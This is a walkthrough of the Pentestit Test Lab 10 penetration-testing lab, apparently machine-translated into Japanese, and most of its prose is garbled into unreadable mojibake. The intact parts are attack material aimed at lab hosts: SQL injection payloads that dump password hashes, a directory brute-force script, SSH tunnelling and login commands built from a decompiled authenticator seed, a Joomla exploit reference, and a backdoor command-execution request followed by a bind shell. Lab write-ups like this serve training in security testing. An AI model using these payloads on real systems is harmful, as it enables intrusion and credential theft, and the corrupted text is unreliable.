
Pentestit Labsã¯å€ãã®äººã ã®äŒçµ±ãšãªã£ãŠããŸãã æ¯å¹Ž5æãš11æã«å¥ã®ç 究æãéèšãããäžçäžã®äœå人ãã®æ奜家ãæ°ããä»®æ³éè¡ããœãããŠã§ã¢éçºè ããŸãã¯ISãµãŒãã¹ãããã€ããŒã®ãããã¯ãŒã¯ã䟵害ããæåã®æ¥ã«ãªããŸã§äœæ¥ãç ããŸããã
次åã®11æ25æ¥ã«ãä»åã¯ç¬¬10ç 究æãç«ã¡äžããããåå è ã¯ãæ å ±ã»ãã¥ãªãã£åéã®ãœãããŠã§ã¢éçºè ã§ããæ¶ç©ºã®äŒç€ŸGlobal Data Securityã®ãããã¯ãŒã¯ã«äŸµå ¥ããããã«æ±ããããŸããã
ã¡ããã©11æ¥åŸã®12æ6æ¥ãç 究宀ã¯ãã°ããŒãã«ããŒã¿ã»ãã¥ãªãã£ãããã¯ãŒã¯ã®è匱ãªåããŒãã«ã¢ã¯ã»ã¹ã§ããç¹å¥ãªããŒã¯ã³ïŒPentestit Webãµã€ãã®ã³ã³ãããŒã«ããã«ã«å ¥åããå¿ èŠã®ããæåãšæ°åã®çµã¿åããïŒãèŠã€ããæåã®åå è ã«åæ ŒããŸããã
ãŸã ç 究宀ãåãäžããæéããªãã£ã人ã®ããã«ãããã¯2017幎5æãŸã§ã¢ã¯ãã£ãã«ãªãããã®åŸæ¢ã«çºè¡šããã11çªç®ã®ç 究宀ã«çœ®ãæããããŸãã ãããŸã§ã®éããã®èšäºã§ã¯ã2016幎æ«ã«ãã³ãã¹ãã¹ãã«ã磚ããçŸåšã®è匱æ§ã«ã€ããŠè©³ããç¥ããããã¹ãŠã®äººã®ããã«ãçŸåšã®ç 究宀ãééãããã¹ãŠã®æ®µéã«ã€ããŠèª¬æããŸãã èšäºã¯é·ãããšãå€æããŸããããã§ããã°èå³æ·±ããã®ã§ãã
å
責äºé
ç§ã¯Pentestitã®åŸæ¥å¡ã§ãé¢é£äŒç€Ÿã§ããããŸããã ãã®ããã¥ã¡ã³ãã§ã¯ãç 究宀ã§ã®ã¿ã¹ã¯ã解決ããããã«è¡ã£ãæé ã«ã€ããŠèª¬æããŸãã ç§ã®å人çãªæšå¥šäºé
ãšå¥œã¿ã¯ãPentestitã®å
¬åŒæèŠãšã¯ãŸã£ããé¢ä¿ãããŸããã
ãã®ããã¥ã¡ã³ãã®ãã¹ãŠã®æ å ±ã¯ãæè²ç®çã§ã®ã¿æäŸãããŠããŸãã ãã®ææžãèªã¿ç¶ããããšã§ãããªãã¯ãã®æ å ±ãéæ³ãªç®çã«äœ¿çšããªãããšã«åæããããªããšããªãã ãããã®ææžããåŸãããè¡åãŸãã¯ç¥èã«å¯ŸããŠå®å šã«è²¬ä»»ãããããšã確èªããŸãã ãã®ããã¥ã¡ã³ãã®äœæè ãšPentestitã¯ããã®ããã¥ã¡ã³ããèªãã çµæåŸãããç¥èãšæ¹æ³ã䜿çšããçµæãšããŠèª°ãã«çããæ害ã«ã€ããŠè²¬ä»»ãè² ããŸããã
ãã®ããã¥ã¡ã³ãã®ãã¹ãŠã®æ å ±ã¯ãæè²ç®çã§ã®ã¿æäŸãããŠããŸãã ãã®ææžãèªã¿ç¶ããããšã§ãããªãã¯ãã®æ å ±ãéæ³ãªç®çã«äœ¿çšããªãããšã«åæããããªããšããªãã ãããã®ææžããåŸãããè¡åãŸãã¯ç¥èã«å¯ŸããŠå®å šã«è²¬ä»»ãããããšã確èªããŸãã ãã®ããã¥ã¡ã³ãã®äœæè ãšPentestitã¯ããã®ããã¥ã¡ã³ããèªãã çµæåŸãããç¥èãšæ¹æ³ã䜿çšããçµæãšããŠèª°ãã«çããæ害ã«ã€ããŠè²¬ä»»ãè² ããŸããã
å®éšå®€ãžã®æ¥ç¶
éå§ããåã«ãã©ãã«ç»é²ããVPNæ¥ç¶ãèšå®ããŠãä»®æ³äŒç€ŸGlobal Data Securityã®ãããã¯ãŒã¯ã«æ¥ç¶ããå¿ èŠããããŸãã
ããã«ç»é²ã ãæ¥ç¶ããããã«ãããã®æ瀺ã«åŸã£ãŠãã ãã ã
ãã¹ãã®ããã«ã Kali Linuxãä»®æ³ãã·ã³ã«ã€ã³ã¹ããŒã«ã§ããŸããããã¯ããã³ãã¹ã¿ãŒåãã®ç¹å¥ãªLinuxãã£ã¹ããªãã¥ãŒã·ã§ã³ã§ãäœæ¥ã«å¿ èŠãªãã®ããã¹ãŠæã£ãŠããŸãã ããªããããããŠããªããã°ãä»ããã®æã§ãã
ãã¹ããéå§
ç»é²ãšæ¥ç¶åŸã次ã®ãããã¯ãŒã¯å³ã衚瀺ãããŸãã

ç§ãã¡ã®åã«ã¯ã192.168.101.9ã®IPã¢ãã¬ã¹ãæã€ã²ãŒããŠã§ã€ããããŸã-äŒç€Ÿã®å€éšã²ãŒããŠã§ã€ã§ãã äŒç€Ÿããã®åŸæ¥å¡ã補åããµãŒãã¹ããããªãã¯ãµã€ãããã³ãµããã¡ã€ã³ãªã©ã«é¢ããååçããã³èœåçãªæ å ±åéã§ãã³ãã¹ããéå§ãããšäŸ¿å©ã§ãã
ååçãªæ å ±åéãšã¯ãäŒç€Ÿã®ãµãŒããŒã«çŽæ¥é£çµ¡ããã®ã§ã¯ãªããGoogleãLinkedInãdata.comãGitHubãªã©ã®å ¬çã«å©çšå¯èœãªãœãŒã¹ã§æ å ±ãèŠã€ããããšããããšãæå³ããŸãã å€ãã®å Žåãå€ãã®èå³æ·±ããã®ãèŠã€ããããšãã§ããŸãïŒåŸæ¥å¡ã®ååã¯ãå éšãããã¯ãŒã¯ã§ãã°ã€ã³ãæ瀺ããŸããGitHubã§ã¯ãäŒç€Ÿã®è£œåãŸãã¯ã€ã³ãã©ã¹ãã©ã¯ãã£ã®å éšæ§é ãããããç¥ãã®ã«åœ¹ç«ã€ãœãŒã¹ããã¹ããèŠã€ããããšãã§ããŸãã
æ®å¿µãªããããã®å Žåãæ å ±ã®ååçãªåéã§ã¯æãŸããçµæãåŸãããŸããã§ããïŒãã ãã 以åã®ã©ãã§ã¯SSHã¿ã¹ã¯ã§éåžžã«æçšã§ããïŒã®ã§ãæ å ±ã®èœåçãªåéãã€ãŸããå©çšå¯èœãªäŒç€Ÿã®ãªãœãŒã¹ãšã®çŽæ¥çãªããåããå¿ èŠã«ãªããŸãã
æ å ±ãåéããŸã
ã²ãŒããŠã§ã€ãä»ããŠã¢ã¯ã»ã¹å¯èœãªããŒããã¹ãã£ã³ããããšããå§ããŸãã

æ®ãã®TCPããŒããšUDPããŒããã¹ãã£ã³ããããšã圹ç«ã¡ãŸãããããã¯ãã°ãã°å¿ããããŸãããå éšVPNïŒäŸïŒ å®éšå®€ïŒ8 ïŒãªã©ã®å€ãã®ãµãŒãã¹ããããŸãã ããã¯æŒç¿ãšããŠæ®ããŸãããããã§ã¯ããã§ã«èŠã€ãã£ãæ å ±ã«éäžããŸãã
ãã®çµæãSSHãµãŒããŒãSMTPã¡ãŒã«ãµãŒããŒã2ã€ã®ãµã€ããããã³ããŒã8100ã§ã®CommuniGate Proã®åœ¢åŒã®åŸæ¥å¡çšã®Webã€ã³ã¿ãŒãã§ã€ã¹ãžã®ã¢ã¯ã»ã¹ãå¯èœã«ãªããŸããããŸãããµã€ãã®èª¿æ»ããå§ããŸãããã
192.168.101.9ã«ã¢ã¯ã»ã¹ããããšãããšãstore.gds.labãã¡ã€ã³ãžã®ãªãã€ã¬ã¯ããååŸããŸãã ã©ãããããã®ä»®æ³ãã¹ããä»ããŠãµã€ãã«ã¢ã¯ã»ã¹ã§ãããµã€ãã«èªåçã«ãªãã€ã¬ã¯ããããŸãã / etc / hostsã«å¿ èŠãªè¡ãè¿œå ããŸãã

念ã®ãããgds.labãè¿œå ããŸããã ããã§ãµã€ããå©çšå¯èœã«ãªããŸããïŒ

OpenCartãããŒã¹ã«ããåºèã«ãªãåã«ã次ã®ããšãããããŸãã

åæã«ããããæ»æããããŸããŸãªè©Šã¿ïŒããšãã°ãXSSãèŠã€ããããOpenCartã«ããè匱æ§ã® 1ã€ã䜿çšããïŒããã®ããŒãžã«ã€ãªãããŸãã

ã©ãããããµã€ãã¯Webã¢ããªã±ãŒã·ã§ã³ãã¡ã€ã¢ãŠã©ãŒã«ã䜿çšããŠä¿è·ãããŠããŸãã å šäœãšããŠãå°ãã®åµå¯ã®åŸã次ã®æ å ±ã«æ°ä»ããŸããã
- ã¹ãã¢ïŒæããã«ã¹ãã¢ããŒã¯ã³ïŒã¯OpenCartã«åºã¥ããŠãããä»®æ³ãã¹ãstore.gds.labãä»ããŠã¢ã¯ã»ã¹ã§ããŸã
- ãµã€ãã«åºã¥ããŠãOpenCartã®ããŒãžã§ã³ããŸã æ£ç¢ºã«å€å¥ããããšãã§ããŠããŸãã
- ã°ãã¹æ»æã¯WAFã«ãã£ãŠãããã¯ãããŸãïŒã€ã³ãžã§ã¯ã·ã§ã³ãXSSããã£ã¬ã¯ããªã®æ¯æžïŒ
- / adminãã©ã«ããŒã¯äœ¿çšå¯èœã§ãããããã©ã«ãã§ã¯åçŽãªãã¹ã¯ãŒãã¯æ©èœããŸãã
ä»®æ³ãã¹ãgds.labã䜿çšããŠããŒã80ã«ã¢ã¯ã»ã¹ããŠã¿ãŸãããã

èå³æ·±ãããšã«ãå¥ã®ãªãœãŒã¹ãownCloudãã¡ã€ã«ãã¹ãã£ã³ã°ãå©çšã§ããŸãã ããŒãžãšã¡ãã»ãŒãžã®ãœãŒã¹ã³ãŒããæ€èšããçµæãæ£ããä»®æ³ãã¹ãã¯cloud.gds.labã§ããããšãããããŸããã hostsãã¡ã€ã«ã«é©åãªå€æŽãå ããåŸããŠãŒã¶ãŒåãšãã¹ã¯ãŒããè©Šãæ©äŒãåŸãŸãã

ãããïŒ ããã€ãã®çµã¿åãããæåã§è©Šãããšãããæšæºã®ãã¹ã¯ãŒãã¯é©åã§ã¯ãªãããšãããããŸããã åæã«ãOwnCloudã«ã¯èå³æ·±ãæ©èœããããŸãããã¹ã¯ãŒããééã£ãŠããå Žåã¯ãã¹ã¯ãŒãããªã»ããã§ããå¿ èŠãªã¢ã«ãŠã³ããååšãããã©ããã«ãã£ãŠç°ãªãã¡ãã»ãŒãžã衚瀺ãããŸãã
ã¢ã«ãŠã³ãããªãå ŽåïŒ

ã¢ã«ãŠã³ããç»é²ãããŠããå ŽåïŒ

ãã¹ã¯ãŒããååŸããããšã¯ã§ããªããããèŠã€ãã£ããŠãŒã¶ãŒåãèšæ¶ããæ å ±ãåéãç¶ããŸããä»åã¯æ¬¡ã®ããŒãã§ãã443ã«é²ã¿ãŸãã
192.168.101.9㯠ãæ®å¿µãªãããhttpsçµç±ã§ã¯ã¢ã¯ã»ã¹ã§ããã次ã®åœ¢åŒã®ã¡ãã»ãŒãžã衚瀺ãããŸãã
An error occurred during a connection to 192.168.101.9. SSL received a record that exceeded the maximum permissible length. Error code: SSL_ERROR_RX_RECORD_TOO_LONG
ã©ãããSSLã§äœãã ãµã€ãã®æ§æãäžååã§ãHTTPçµç±ã§ã¢ã¯ã»ã¹ã§ããŸãã

ã©ããããããã¯äŒç€Ÿã®ã¡ã€ã³ãµã€ãã§ãã æåã®ããŒã¯ã³ãååŸããŠã¿ãŸãããïŒ
åŠç¿site
ãµã€ãã®ããŒãžãæ éã«èª¿æ»ããçµæãæããã«GDSã®éçºè ã«ãã£ãŠäœæããããã®ã§ãããWordPressã®ãããªæ¢è£œã®CMSã䜿çšããŠããªãããšãããããŸããã
å€ãã®è匱æ§ããŠãŒã¶ãŒå ¥åã«é¢é£ããŠããã®ã§ãå©çšå¯èœãªãšã³ããªãã€ã³ããèŠãŠã¿ãŸãããã äœæãèŠã€ããïŒ
http://192.168.101.9:443/post.php?id=1
æåŸã«åŒçšç¬Šã1ã€è¿œå ãããšããµã€ãã®ã¡ã€ã³ããŒãžã«ãªãã€ã¬ã¯ããããŸããã2ã€ããå Žåã¯-ãããã SQLã€ã³ãžã§ã¯ã·ã§ã³ã®ããã«èŠããŸãã å°ãå®éšããŠã¿ããšãæ¡ä»¶ãæ¬åŒ§å ã«ããããšãããããŸãã
http://192.168.101.9:443/post.php?id=1') -- -
åæã«ãUNION SELECTãè¿œå ããããšããŠãæåããŸãããæããã«ããµã€ãã«ã¯SQLã€ã³ãžã§ã¯ã·ã§ã³çšã®ãã£ã«ã¿ãŒããããŸãã æšæºã®å€§æåãšå°æåãåºå¥ããææ³ã䜿çšããŠããããåé¿ããŠã¿ãŸãããã
http://192.168.101.9:443/post.php?id=-1') UNiOn SeLect 1, @@veRsiOn -- -
ããŒãã«ãååŸããŸãã
http://192.168.101.9:443/post.php?id=-1') UNiOn seLeCT 1, GrouP_CONcaT(TabLe_nAmE) FroM InfOrMatIoN_scHemA.TabLes WheRe TabLe_sCheMa=database() -- -
次ã«ããã£ãŒã«ãïŒ
http://192.168.101.9:443/post.php?id=-1') UNiOn seLeCT 1, GrouP_CONcaT(ColUmN_nAmE) FroM InfOrMatIoN_scHemA.ColuMns WheRe TabLe_NaME='users' -- -
ãããŠããŠãŒã¶ãŒåãšãã¹ã¯ãŒãã®ããã·ã¥ïŒ
http://192.168.101.9:443/post.php?id=-1') UNiOn alL (seLeCT usErNAme, pAssWoRd FroM users liMIT 0,1) -- -

hashcatïŒGPUã䜿çšããå Žåã¯ä»®æ³ãã·ã³ã®å€éšãæãŸããïŒã䜿çšããŠãã¹ã¯ãŒããå埩ããŸãïŒ SecListsèŸæžã匷ããå§ãããŸãïŒã

ããã£ãïŒ dirsearchã䜿çšããŠã/ adminãã©ã«ããŒã«ç®¡çã€ã³ã¿ãŒãã§ã€ã¹ãèŠã€ããŸãã

ããã§èŠã€ãã£ããŠãŒã¶ãŒåãšãã¹ã¯ãŒããå ¥åãããšãæåã®ããŒã¯ã³ãååŸãããŸãã

--tamper = randomcaseãªãã·ã§ã³ãæå¹ã«ããSQLMapã§ãåãçµæãåŸãããŸããããããã«ããŠãæåŸã®ã¯ãšãªãæåã§å®è¡ããå¿ èŠããããŸãã
mail
åã
ãµã€ãã®èª¿æ»äžã調æ»ããã»ã¹ã§èŠã€ãã£ããã¹ãŠã®æ å ±ã«æ³šæãæããŸãã æ å ±ã®åéãåæ¢ãããèŠã€ãã£ããã¹ãŠã®æ©èœãèšé²ãç¶ããããšãéåžžã«éèŠã§ãã
ç¹ã«ããåãåããããŒãžã«ã¯ã2ã€ã®ã¢ã«ãŠã³ãã«é¢ããæ å ±ããããŸãã

ãŸããã¡ã€ã³ããŒãžã«ã¯ä»ã®äººãžã®ãªã³ã¯ããããŸãã

ãã®çµæãã¡ãŒã«ãµãŒããŒçšã«3ã€ã®ã¢ã«ãŠã³ããååŸããŸãã
- a.modlin
- s.locklear
- j.wise
- e.lindseyïŒãµã€ãããã®ãã¹ã¯ãŒãã¯é©åã§ãããã¡ãŒã«ã«ã¯äœããããŸããïŒ
ãããã®ãŠãŒã¶ãŒã®ãããããèŸæžãã¹ã¯ãŒãã䜿çšããŠãããã©ããã確èªããŸãã

ãŠãŒã¶ãŒa.modlinã®ãã¹ã¯ãŒããååŸããããšãå€æããŸããã ããŒã8100ã§WebããŒã¹ã®ã¡ãŒã«ã€ã³ã¿ãŒãã§ã€ã¹ã䜿çšããŸãã

ããã次ã®ããŒã¯ã³ã§ãããšåæã«ãJoshua Wiseããã®Androidã¢ããªã±ãŒã·ã§ã³ãšæ¬¡ã®å 容ã®æçŽã§ãã

IPã¢ãã¬ã¹ãšãããã¯ãŒã¯å³ããå€æãããšããããå°æ¥ã®ããã«èŠããŠãããŸãããããã®ã¢ããªã±ãŒã·ã§ã³ã¯
ssh-test
ããŒã¯ã³ã«åœ¹ç«ã¡ãŸãã
çŸæç¹ã§ã¯ããµã€ãïŒããŒã443ïŒãæ éã«æ€èšããããã䜿çšããŠ2ã€ã®ããŒã¯ã³ãååŸããŸãããããã«ã80çªç®ã®ããŒãã§2ã€ã®ä»®æ³ãã¹ãïŒstore.gds.labãšcloud.gds.labïŒãèŠã€ããŸããã åŸè ã¯WAFã«ãã£ãŠä¿è·ãããŠãããããå¯èœãªãªãã·ã§ã³ãè±å¯ã«ããã«ãããããããããã¯ãç¶ç¶ããŠããããã«è匱æ§ãèŠã€ããããšã¯ã§ããŸããã§ããã
å éšãããã¯ãŒã¯ã«ã¢ã¯ã»ã¹ããŠãããããç¶è¡ããŠã¿ãŸãããã
SSHãµãŒããŒ
å€ãã®å ŽåããŠãŒã¶ãŒã¯ç°ãªããµãŒãã¹ã§åããã¹ã¯ãŒãã䜿çšããŸãã ãµã€ãã«ãããã¹ã¯ãŒãã䜿çšããŠãe.lindseyããSSHãµãŒããŒã«ã¢ã¯ã»ã¹ããŠã¿ãŸãããã

ããã£ãïŒ ãã¹ãã«ã¯nmapããããå éšãããã¯ãŒã¯å šäœãå©çšã§ããŸãã ããŒã¯ã³ãæ¢ããŠããã¹ãŠãããã»ã©åçŽã§ã¯ãªãããšãç解ããŠããŸãã
ãµãŒããŒã«ã¯å€ãã®èå³æ·±ããã®ããããŸãã ãšãããã以äžãèŠã€ããŸãã
- / etc / passwdããã³/ homeã³ã³ãã³ãã®å€ãã®æ°ããã¢ã«ãŠã³ãã
- / var / www /ã«ããã¹ãã¢ã®ãœãŒã¹ã³ãŒããããããOpenCartããŒãžã§ã³ãããŒã«ã«MySQLã®ãã¹ã¯ãŒããããã³OpenCart管çè ãã¹ã¯ãŒãã®ããã·ã¥ã決å®ããŸã
- ãã°ã€ã³æš©éã¯ããããªã¹ãæš©éã¯ãªã/ data / usersãã©ã«ãã
Linuxãã·ã³ãæªçšããå Žåã®éåžžã«äŸ¿å©ãªæé ã«ã€ããŠã¯ã ãã¡ããã芧ãã ãã ã ãã®å ŽåãSSHãµãŒããŒã§ã®æš©éææ Œã¯ãå®éšå®€ã®äœæè ãæå³ãããã®ã§ã¯ãããŸãããããããã®å Žåã§ããè¿œå ã®ã¹ã¯ãªãããæ§æèšå®ãWebãµã€ããã¹ã±ãžã¥ãŒã©ãŒã®ã¿ã¹ã¯ãæ¥ç¶ããããã¡ã€ã«ã·ã¹ãã ãªã©ã®ã³ã³ãã³ãã調æ»ããããšã¯éåžžã«äŸ¿å©ã§ãã
ãµã€ãã®æ§æã«ããŒã¯ã³ããªãå Žåã/ data / usersãã©ã«ããŒã«éäžããŸãã

ã芧ã®ãšãããrãããã¯ãããŸããããxããããååšããŸããã€ãŸãããã©ã«ããŒã®å 容ãå ¥åããŠæäœããããšã¯ã§ããŸããããã®ãªã¹ãã¯è¡šç€ºã§ããŸããã ãŠã§ãäžã§åãã¿ã¹ã¯ïŒãã£ã¬ã¯ããªãªã¹ããã»ãšãã©åžžã«ç¡å¹ã«ãªã£ãŠããå ŽæïŒã«çŽé¢ãããšãdirbãdirsearchãªã©ã®ãŠãŒãã£ãªãã£ã䜿çšããŸãããããã®ãŠãŒãã£ãªãã£ã¯ããã£ã¯ã·ã§ããªå ã®ãã¡ã€ã«ãéããå€ãã®çµã¿åããããœãŒãããŸãã ããã§ãåãããšãè©ŠããŠã¿ãŸããããdirbããèŸæžã䜿çšã§ããŸãã
èŸæžã§å¿ èŠãªãµããã£ã¬ã¯ããªãšãã¡ã€ã«ãååž°çã«è©Šãå°ããªã¹ã¯ãªãããäœæããŸãããã
"""Importing os to access file system""" import os PATH = "/data/users/" DICC = "/var/tmp/common.txt" def attempt_path(path): """Check if file or directory exists and print out the result. Return true if directory""" if os.path.isfile(path): print "Found file : " + path return False if os.path.isdir(path): print "Found dir : " + path return True return False def look_for_subdirs(path): """Recursive function to look for dirs""" with open(DICC) as dicc: for line in dicc: curr_path = path + line.rstrip('\n') if attempt_path(curr_path): look_for_subdirs(curr_path + "/") look_for_subdirs(PATH) print "Finished"
ããã§ãèŸæžãæºåããŠsshãµãŒããŒã«ã¢ããããŒãããå¿ èŠããããŸãã 1ã€ã®æ¹æ³ã¯ãèŸæžãšPythonã³ãŒããããŒã«ã«WebãµãŒããŒã«é 眮ããwgetã䜿çšããŠãããããããŠã³ããŒãããããšã§ãã
/usr/share/dirb/wordlists/common.txt
kaliã«ããdirbããèŸæžãååŸããããã«ããŒã«ã«ãŠãŒã¶ãŒã®ååãè¿œå ãããšåæã«ãtoken.txtãã¡ã€ã«ãè¿œå ããŸãïŒã©ããã«ããããšãé¡ã£ãŠããŸãïŒã


æ®å¿µãªããããã¹ã172.16.0.8ããIPã«çŽæ¥ã¢ã¯ã»ã¹ã§ããªããããSSHãã³ãã«ã䜿çšããŸãã

泚æãã¹ãç¹ã2ã€ãããŸãã
æåã«ããlocalhostïŒ80ãã®ãªã¢ãŒãéšåïŒã€ãŸããããŒã«ã«Kaliãã·ã³ã®ããŒã80ã«ãããã®ïŒãããŒã«ã«ããŒãïŒSSHãµãŒããŒçšïŒ8765ã«è»¢éããããšã«ããããªã¢ãŒãããŒã転éãè¡ããŸãããã®ã³ãã³ãã©ã€ã³ssh>ãåŒã³åºãããšãã§ããŸããCããŒã®çµã¿åãããæŒããŸãïŒShiftããŒãæŒããªããããæŒããŠããCãæŒããŸãïŒã
ããã§ãããŒã«ã«WebãµãŒããŒãSSHãã¹ãã§å©çšå¯èœã«ãªããŸããã ãããã·ãµãŒããŒã¯ãµãŒããŒã§ããã©ã«ãã§æå¹ã«ãªã£ãŠããŸã;ããŒã«ã«ããŒãã®å Žåã¯ã
unset
åé€ãã䟡å€ããããŸãã
ããã§ãã¹ã¯ãªãããå®è¡ããæºåããã¹ãŠæŽããŸããã

ãã©ã«ããŒ
/data/users/rross/docs/
ãããŒã¯ã³ãšSSHããŒrross-aãèŠã€ãããŸããã ããã«ããŠãŒã¶ãŒa.modlinã®SSHããŒããŸã èŠã€ãããŸããã 確ãã«ãããã®1ã€ãssh-testã«é©åããŸãã ç¶ããŸãããïŒ
ssh-test
ãæ±ãssh-test
mail
ããŒã¯ã³ãèŠã€ãã£ããšããgds-authenticatorã¢ããªã±ãŒã·ã§ã³ã®ããŒãžã§ã³ãå©çšå¯èœã«ãªããŸããã

Alfred Modlinå®ãŠã®æçŽãããããããã«ããµãŒããŒã«å ¥ãã«ã¯ããŒãŸãã¯ãã¹ã¯ãŒããããã³åžžã«å€åããSSHããŒãçªå·ã®2ã€ã®èŠçŽ ãå¿ èŠã§ãã nmapã䜿çšããŠéããŠããããŒããç°¡åã«èŠã€ããããšãã§ããããã2çªç®ã®èŠå ã®æå¹æ§ã¯éåžžã«çãããã§ãããããã§ããã®ã¿ã¹ã¯ãèè ãææ¡ããæ¹æ³ã«ããŸãã apkã解åããclasses.dexãæœåºããŸãã

次ã«ãåãååã®ãŠãŒãã£ãªãã£ã䜿çšããŠãdexãjarã«å€æããŸãã

ãããŠæåŸã«ã JDãã³ã³ãã€ã©ã䜿çšããŠãœãŒã¹ãååŸããŸãã

protected void setAuthCode() { String str = new HOTP().gen("WFLHQEBMJ3XLPDOY", (int)Math.floor(System.currentTimeMillis() / 1000L / 30L), 6); int i = Integer.parseInt(str.substring(-5 + str.length())); if (i > 65534) { i %= 65534; } TextView localTextView = (TextView)findViewById(2131492983); Object[] arrayOfObject = new Object[1]; arrayOfObject[0] = Integer.valueOf(i); localTextView.setText(String.format("%d", arrayOfObject)); }
ã芧ã®ãšãããHOTPã¯ã©ã¹ã䜿çšãããŸããããã¯ãapkã§ã䜿çšã§ããèšç®çšã®ã·ãŒããšããªç§ãæå®ãããŠããŸãã å¿ èŠã«å¿ããŠèªåçã«ãããè¡ãæ¹æ³ãåŠç¿ããããã«ãããŒãçªå·ãçæããã³ãŒããæœåºããŠã¿ãŸãããã

ãããŠãã³ã³ãã€ã«ããŠå®è¡ããŸãïŒ

ããŒããããã1è¡ã§sshãã¹ãã«æ¥ç¶ããã³ãã³ããæžãããã«æ®ã£ãŠããŸãã
/data/users/a.modlin/docs/key
ãããŒã«ã«ãã©ã«ããŒã«
/data/users/a.modlin/docs/key
ã䜿çšããŠKaliãã·ã³ããå éšãããã¯ãŒã¯ã«ã¢ã¯ã»ã¹ã§ããããã«ããŸãã
sshuttleïŒè²§ä¹äººã®VPNãšãåŒã°ããŸãïŒã¯ãiptablesã«ãŒã«ã䜿çšããŠãsshãã³ãã«ãä»ããŠå éšãµããããã䜿çšå¯èœã«ããŸãã ç§ãã¡ã¯æ¬¡ã®ããã«ã€ãªãã£ãŠããŸãã

æ¥ç¶ããbashã¹ã¯ãªãããäœæããŸãããã
#!/bin/sh ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -i key a.modlin@172.16.0.1 -p$(java Main)
æ¥ç¶ããã次ã®ããŒã¯ã³ãèŠã€ãããŸãã

blog
æ»æãã
ãããã¯ãŒã¯å³ããå€æãããšãå瀟ã®ããã°ã¯192.168.0.4ã«ãããã¯ã€ãã¯ããŒãã¹ãã£ã³ã«ãããéããŠãã80çªç®ã®ããŒãã®ååšã確èªãããŸãã sshuttleãä»ããŠæ¥ç¶ããããã°ã§èŠã€ãããããã®ã確èªããŸãã

JoomlaïŒã€ã³ã¹ããŒã«ã®ããã«èŠããŸã ãã§ãã¯ïŒ

ããã§ãã Jumlaã®æè¿ã®ã»ã³ã»ãŒã·ã§ãã«ãªè匱æ§ãè©ŠããŠã¿ãŸããããããã«ãããèªèšŒãªãã§ç®¡çè ã¢ã«ãŠã³ããäœæã§ããŸãã ãã®ãšã¯ã¹ããã€ããåç §ã«ãã䜿çšããããšããããšãã°Metasploitã®ã¢ãžã¥ãŒã«ã䜿çšããããšãã§ããŸãã

ç®çã®ãŠãŒã¶ãŒã®äžã«ç§»åããŸãã

æªå ¬éã®èšäºãæ€çŽ¢ïŒ

ãããŠããã®ãšã€ãªã¢ã¹ãããŒã¯ã³ã®åœ¢ã§äœ¿çšããããã°ã¯åŽ©å£ããŸããïŒ
ãã£ããã£ã®è§£æ
192.168.0.7ã® captchaãåãããµãŒããŒã§ã¯ãå€ãã¯æäŸãããŸãããç»åãããŒããããŠããªã空çœã®ããŒãžã ãã§ãã ã¡ã€ã³ã®ãœãŒã¹ã³ãŒããå°ãå匷ãã
ããŒãžïŒä»¥åã«sshuttleã䜿çšããŠsshã«æ¥ç¶ããŠããïŒã«ã€ããŠã次ã®çµè«ãå°ãåºãããšãã§ããŸãã
- ç»åã¯ãæ¬äŒŒã©ã³ãã åã§ãœãŒã¹ã®ãµããã©ã«ããŒã«çæãããŸã
- ãµããã©ã«ããŒåã¯ã»ãã·ã§ã³ããšã«ä¿åãããæ°ããã»ãã·ã§ã³çšã«åçæãããŸãïŒPHPSESSIDãå€æŽããå Žåãããã¯ç解ã§ããŸãïŒ
- ç»åèªäœã¯åäœããŸãã-ã©ããããå€ãå¿ããããéçºããŒãžã§ã³ã®ãããªãã®
ãããã®ããããã次ã«äœããã¹ããã«ã€ããŠã®çŽæ¥çãªã¬ã€ãã³ã¹ãæäŸããŸããã dirsearchã䜿çšãããšãèå³æ·±ãããšãããããŸãã

robots.txtã®å 容ã«åºã¥ããŠãé ãããbakãã¡ã€ã«ãããããšãç解ããŠããŸããããã¯æããã«æãèå³æ·±ããã®ã§ãã

åæã«ãreadme.txtã¯ãåçãçæãããŠãããã°ããããŠããåé€ããããšèšã£ãŠããŸãã
ã¡ã€ã³ããŒãžããç»åãžã®ãã¹ãååŸããŸãã
http://192.168.0.7/sources/43f1045f7bfd9bac63fc56dee0de5fc079b2e8a5b504548052de295444e71f5a496e1b931063b6e731844c2bfc2fd3f2cde4cd566d7c77c6e195a8b1362d9955f5ecc512b28eed353386bd0c07f7e17704ea3e4c59450e1b1c2a30e19bfacff4662cb0/captcha.png
é衚瀺ã®bakãã¡ã€ã«ãæ¢ããŠãããããpngæ¡åŒµåãbakã«çœ®ãæããŠã¿ãŠãã ããã
http://192.168.0.7/sources/43f1045f7bfd9bac63fc56dee0de5fc079b2e8a5b504548052de295444e71f5a496e1b931063b6e731844c2bfc2fd3f2cde4cd566d7c77c6e195a8b1362d9955f5ecc512b28eed353386bd0c07f7e17704ea3e4c59450e1b1c2a30e19bfacff4662cb0/captcha.bak

ã©ããããããã¯ããœãŒã¹ã³ãŒãã®ããã¯ã¢ããã³ããŒã§ããããã¯ãã·ãªã¢ã«åãããã»ãã·ã§ã³ãæã€captchaãã¡ã€ã«ãšãã»ãã·ã§ã³GETãã©ã¡ãŒã¿ãŒã§ã³ãã³ããåãå ¥ããŠå®è¡ããããã¯ãã¢ã·ã§ã«ãæã€ãã¡ã€ã«ãããããšã瀺ããŸãã
æ®å¿µãªãããããäžåºŠå ¥åãããšããã以äžãã¡ã€ã«ã¯ãããŸããã 圌ã¯ã©ãã«è¡ããŸãããïŒ readme.txtãæãåºããŠãã ããããã°ãããããšåé€ãããŸãã äœåºŠãè©Šè¡ããçµæã/ index.phpãå ¥åãããšãã¡ã€ã«ãåã³äœ¿çšå¯èœã«ãªãããšãããããŸãã captcha.bakããã®ä»ã®ãã¡ã€ã«ãåžžã«å©çšã§ããããã«ããããã«ããããåžžã«è¡ãçãã«ãŒããäœæããŸãããã
while true; do curl -i -s -k -b 'PHPSESSID=et07feiohsrnaf11n0kt31rf83' http://192.168.0.7/; done
ãã¡ã€ã«ãå ã®å Žæã«æ»ããŸããã
($_SESSION.php)?session=whoami
ãã³ãŒãããªã¢ãŒãã§å®è¡ã§ããããšã確èªããŸãã

次ã«ãããŒã1234ã®ãã¹ã192.168.0.7ã§ãã€ã³ãã·ã§ã«ãäœæããŸãã
